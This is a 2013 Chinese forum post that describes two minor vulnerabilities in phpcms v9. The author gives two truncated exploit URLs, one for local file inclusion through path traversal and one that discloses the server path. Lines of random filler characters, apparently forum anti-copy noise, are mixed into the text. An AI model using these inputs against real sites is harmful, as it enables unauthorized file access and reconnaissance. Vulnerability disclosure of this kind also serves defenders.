找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2097|回复: 0
打印 上一主题 下一主题

phpcms v9两个鸡肋漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:28:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
* o* m5 Z  r9 |3 I# H) \- X* b1 \+ K4 C, C' i9 T" E8 c: K' Z1 T. I2 V
Exp: http://www.php0day.com/api.php?o ... efile=../../../fuck
0 d0 Q3 k& w+ y, S5 p/ W1 _
* Q: h. M. q3 M6 l" K) b3 A- S#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
7 U5 }# O5 _' J: U1 n) z
  Y2 r( W8 h  D& Y' t1 q! FExp: http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy7 M3 X$ o: m  f7 {' U2 W1 a

' I( [" a5 e* Z  C- P9 Z#暴路径
% }8 x- g) Z- W' d/ I9 }3 S8 r, T
' M- w$ ]( T6 {9 m9 u- B注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。( y$ b) e& C1 w9 |5 h# ]5 t: r: s

' R$ j, x' N: e3 W' H4 o# ~3 [! l
3 v; _$ V6 G  o% ]" \7 [  k1 W2 }' A  q' i; m' V* X
+1
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表